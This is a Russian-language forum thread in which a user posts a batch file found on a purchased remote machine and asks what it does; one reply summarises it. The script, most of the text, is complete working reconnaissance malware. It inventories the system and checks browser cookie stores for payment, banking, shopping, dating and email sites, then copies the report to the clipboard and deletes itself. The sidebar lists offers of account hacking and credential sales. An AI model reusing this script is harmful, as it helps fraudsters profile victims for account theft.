Батник на деде

Fedmex · 09.12.2016

Покупал дед, на нем оказался такой батник, может кто расшифровать?

@echo off

setlocal ENABLEEXTENSIONS
set "paymentlist=cookie_check.paypal.com paypal.comcookie_check account.skrill.com westernunion.com neteller.com entropay.com 2checkout.com wepay.com .v.me gopayment.com dwolla.com aib.ie barclaycardus.com capitalone.com chase.com coinbase.com liqpay.com moneybookers.com open24.ie payeer.com paysurfer.com perfectmoney.com suntrust.com wellsfargo.com"
set "shoplist=sears.com overstock.com ebay.comnonsession dell.com amazon.comsession apple.comdssid beacon.walmart.com bestbuy.comcontext_id newegg.coms_per airbnb.com bhphotovideo.com farfetch.com lowes.com officedepot.com qvc.com steampowered.com target.com"
set "datinglist=match.com mysinglefriend.com friendfinder.com jdate.com gay.com christianconnection.com muddymatches.co.uk zoosk.com shaadi.com datingdirect.com lovearts.com amateurmatch.com cupid.com datehookup.com meetic.com meetme.com"
set "otherlist=accounts.google.com mail.live.com login.yahoo.com att.com sprint.com verizonwireless.com vzw.com verizon.com craiglist.org indeed.com sendspace.com swiftunlocks.com ups.com whoer.net fedex.com"

echo go > %temp%/win_install.log.txt

echo ====start_product==== >> %temp%/win_install.log.txt
REG QUERY "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName >> %temp%/win_install.log.txt
echo ====end_product==== >> %temp%/win_install.log.txt

echo ====start_cpuname==== >> %temp%/win_install.log.txt
REG QUERY "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0" /v ProcessorNameString >> %temp%/win_install.log.txt
echo ====end_cpuname==== >> %temp%/win_install.log.txt

echo ====start_cpus==== >> %temp%/win_install.log.txt
echo %NUMBER_OF_PROCESSORS% >> %temp%/win_install.log.txt
echo ====end_cpus==== >> %temp%/win_install.log.txt

echo ====start_domain==== >> %temp%/win_install.log.txt
echo %USERDOMAIN% >> %temp%/win_install.log.txt
echo ====end_domain==== >> %temp%/win_install.log.txt

::get soft list
echo ====start_softlist==== >> %temp%/win_install.log.txt
for /f "skip=4 tokens=*" %%a in ('reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"') do (
::echo %%~na
for /f "tokens=*" %%b in ('REG QUERY "%%a" /v DisplayName 2^>nul') do (
echo %%b>> %temp%/win_install.log.txt
)
)
echo ====end_softlist==== >> %temp%/win_install.log.txt

echo ====start_tasklist==== >> %temp%/win_install.log.txt
tasklist >> %temp%/win_install.log.txt
echo ====end_tasklist==== >> %temp%/win_install.log.txt

echo ====start_admin==== >> %temp%/win_install.log.txt

::check for admin rights
net session >nul 2>&1
if %errorLevel% == 0 (
echo userisadmin >> %temp%/win_install.log.txt
) else (
echo userisnotadmin >> %temp%/win_install.log.txt
)

echo ====end_admin==== >> %temp%/win_install.log.txt

echo ====start_ip==== >> %temp%/win_install.log.txt

::now get IPV4 from ipconfig
ipconfig | find "IPv4" >> %temp%/win_install.log.txt

echo ====end_ip==== >> %temp%/win_install.log.txt

echo ====start_brws==== >> %temp%/win_install.log.txt
IF EXIST "%programfiles(x86)%\Google\Chrome\" (
echo brw_chrome_exist >> %temp%/win_install.log.txt
)
IF EXIST "%programfiles(x86)%\Mozilla Firefox\" (
echo brw_firefox_exist >> %temp%/win_install.log.txt
)
IF EXIST "%programfiles%\Google\Chrome\" (
echo brw_chrome_exist >> %temp%/win_install.log.txt
)
IF EXIST "%programfiles%\Mozilla Firefox\" (
echo brw_firefox_exist >> %temp%/win_install.log.txt
)
echo ====end_brws==== >> %temp%/win_install.log.txt

echo ====start_src==== >> %temp%/win_install.log.txt

::check if ie
IF EXIST %appdata%\Microsoft\Windows\Cookies (
echo browser: ie yes >> %temp%/win_install.log.txt

cd /d %appdata%\Microsoft\Windows\Cookies

for %%i in (%paymentlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)

IF EXIST %appdata%\Microsoft\Windows\Cookies\Low (

cd /d %appdata%\Microsoft\Windows\Cookies\Low

for %%i in (%paymentlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)

)

)

::check if ie in win 8,8.1,10
IF EXIST %localappdata%\Microsoft\Windows\INetCookies (

cd /d %localappdata%\Microsoft\Windows\INetCookies

for %%i in (%paymentlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)

)

::check if firefox installed
IF EXIST %appdata%\Mozilla\Firefox (

cd /d %appdata%\Mozilla\Firefox\Profiles

for /d %%F in (*) do cd /d "%%F"

IF EXIST cookies.sqlite (
::search payments
for %%i in (%paymentlist%) do (
findstr /m %%i cookies.sqlite>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i cookies.sqlite>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i cookies.sqlite>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i cookies.sqlite>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)
)

)

::check if chrome installed
IF EXIST %localappdata%\Google\Chrome\User Data\Default (

cd /d %localappdata%\Google\Chrome\User Data\Default

IF EXIST Cookies (
::search payments
for %%i in (%paymentlist%) do (
findstr /m %%i Cookies>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i Cookies>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i Cookies>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i Cookies>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)
)

)

echo ====end_src==== >> %temp%/win_install.log.txt

::notepad %temp%/win_install.log.txt

cd /d %temp%
TYPE win_install.log.txt | clip
del win_install.log.txt

::echo Please press enter to exit and delete file

:

ause >nul

DEL "%~f0"

LamerOnLine · 11.12.2016

Fedmex сказал(а):
Покупал дед, на нем оказался такой батник, может кто расшифровать?

Если удалить нижние строчки

cd /d %temp%
TYPE win_install.log.txt | clip
del win_install.log.txt

::echo Please press enter to exit and delete file

:

ause >nul

DEL "%~f0"

Файл создаст отчёт в папке C:\Users\Имя_пользователя\AppData\Local\Temp
В нём будет:
Версия ОС, модель процессора, количество ядер, имя компьютера.
Установленный софт.
Список запущенных процессов.
Проверка пользователя на права администратора.
Все IPv4 адреса.
Установленные браузеры.
Проверка URL адресов из списка в истории этих браузеров.

Автор	Заголовок	Раздел	Ответы	Дата
1	Батник для создания скрытых учёток, бэкдоров и т.д.	Уязвимости и взлом	0	14.01.2019
	Neuralink на пороге чуда: FDA одобрило имплант для слепых	Новости в сети	0	Сегодня в 05:01
	Crimson Palace: кибершпионский тайфун обрушился на Юго-Восточную Азию	Новости в сети	0	12.09.2024
	Tropic Trooper: хакеры теперь сеют хаос на Ближнем Востоке	Новости в сети	0	10.09.2024
B	Брут на Bongacams	Предоставляю работу. Ищу специалиста.	0	06.09.2024
	ФБР раскрыло сеть влияния на выборы США	Новости в сети	0	06.09.2024
	От защите к атаке: MacroPack перешел на сторону хакеров	Новости в сети	0	06.09.2024
	Убийцы на расстоянии: раскрыт международный заговор сваттеров	Новости в сети	0	03.09.2024
	Тайна псевдонима: ФБР использовало книгу на Amazon как главную улику в деле	Новости в сети	0	29.08.2024
	Что общего между F-16 и Tinder? Новая игра США на Ближнем Востоке	Новости в сети	0	29.08.2024
	Sway и QR-коды: опасный фишинговый тандем, нацеленный на сервисы Microsoft 365	Новости в сети	0	28.08.2024
	Telegram на грани: арест Дурова ставит под угрозу будущее мессенджера	Новости в сети	0	28.08.2024
	Схема «Мамонт»: 4500 мошенников охотятся на арендодателей	Новости в сети	0	27.08.2024
	Дело Павла Дурова: на перекрестке технологий, политики и прав человека	Новости в сети	0	26.08.2024
	5 миллионов сайтов на грани взлома из-за LiteSpeed Cache	Новости в сети	0	23.08.2024
	Сертификат на взлом: хакерам предложат выйти из подполья в России	Новости в сети	0	22.08.2024
	UULoader обрушил серию мощных атак на жителей Азии	Новости в сети	0	21.08.2024
	Ожидает оплаты Ищу специалиста по лидогенерации. Ниша: Продажа недвижимости на Пхукете	Предоставляю работу. Ищу специалиста.	0	20.08.2024
	CryptoCore: за кулисами аферы на $5,4 млн	Новости в сети	0	15.08.2024
	Лариса Долина лишилась недвижимости на 130 миллионов рублей	Новости в сети	2	14.08.2024
	В Молдове задержаны мошенники, организовавшие финансовую пирамиду на 750 000 евро	Новости в сети	0	09.08.2024
G	Интересно [ADS\|CEO] поток трафика на ваш сайт	Ищу работу. Предлагаю свои услуги.	0	08.08.2024
	Роскошное авто или троян? Хакеры из APT28 играют на ваших желаниях	Новости в сети	0	06.08.2024
	Project Disrupt: как молодые канадцы обманули систему на миллион долларов	Новости в сети	0	06.08.2024
	Осторожно, груз опасен: глобальная фишинг-атака на промышленные компании	Новости в сети	0	01.08.2024
	Получаем от 5к до 50к ₽ на халяву	Способы заработка	3	30.07.2024
	Троян на 3000 устройствах: как начались Олимпийские игры в Париже	Новости в сети	1	28.07.2024
	Хомяк ест ваши деньги: за что на самом деле борются игроки Hamster Kombat	Новости в сети	2	26.07.2024
	Интересно Заработок на заливах до 30к$ и выше в месяц	Способы заработка	0	23.07.2024
	Интересно Регулярно от 500$ и выше каждый месяц на полном пассиве.	Способы заработка	1	23.07.2024
	Куплю Куплю базы mail:pass usa тематики ставки на спорт	Куплю/Продам	0	20.07.2024
	TAG-100: открытый код на службе шпионов	Новости в сети	0	18.07.2024
	ShadowRoot: новая вымогательская угроза обрушилась на турецкий бизнес	Новости в сети	0	17.07.2024
	DNS-атака на DeFi: сотни протоколов оказались под угрозой взлома	Новости в сети	0	16.07.2024
	Gh0st RAT, RedTail, XMRig: какие ещё угрозы могут проникнуть на ваш компьютер из-за уязвимости в PHP	Новости в сети	0	11.07.2024
	✅ sms.chekons.com - ⭐ Сайт для получения SMS на реальные номера USA "Non-VoIP, безлим SMS, API" от 0.4$ за номер⭐	Ищу работу. Предлагаю свои услуги.	0	10.07.2024
	Mekotio: обновлённый банковский троян нацелился на Латинскую Америку	Новости в сети	0	09.07.2024
	Бухгалтерия как приманка: новые детали атак VasyGrek на компании РФ	Новости в сети	0	09.07.2024
	Новая мошенническая схема, нацеленная на индивидуальных предпринимателей и тех, кто использует режим «Налог на профессиональный доход»	Новости в сети	0	08.07.2024
T	Без предоплаты! Взлом почты Mail.ru на заказ, взлом почты Рамблер, Взлом пароля Rambler.ru inbox.ru list.ru bk.ru internet.ru xmail.ru	Ищу работу. Предлагаю свои услуги.	0	07.07.2024
F	Ожидает оплаты Traffic - на любые ваши проекты \| Traffic Angels!	Ищу работу. Предлагаю свои услуги.	0	29.06.2024
	0day-эксплойт для Chrome выставлен на продажу за $1 000 000	Новости в сети	0	28.06.2024
	48 часов на спасение: LockBit выставили ультиматум хакеров Федрезерву	Новости в сети	1	26.06.2024
	Интернет-тролли: кто они на самом деле?	Новости в сети	0	24.06.2024
	Удаленщики играют с работодателями в кошки-мышки: на грани этики и контроля	Новости в сети	0	20.06.2024
	Беспринципный исследователь «обнёс» криптобиржу Kraken на $3 млн	Новости в сети	0	20.06.2024
	102 года за фишинг: афера на $1,5 млн закончилась для мошенников тюремной камерой	Новости в сети	0	18.06.2024
	30 дней на сборы: Slack объявил дедлайн для пользователей из РФ	Новости в сети	0	17.06.2024
	70% киберспециалистов на грани срыва, 64% уже подыскивают новую работу	Новости в сети	1	14.06.2024
	Рост на 625%: программы-вымогатели бьют все рекорды в мае	Новости в сети	0	14.06.2024

Батник на деде

Fedmex

LamerOnLine

Название темы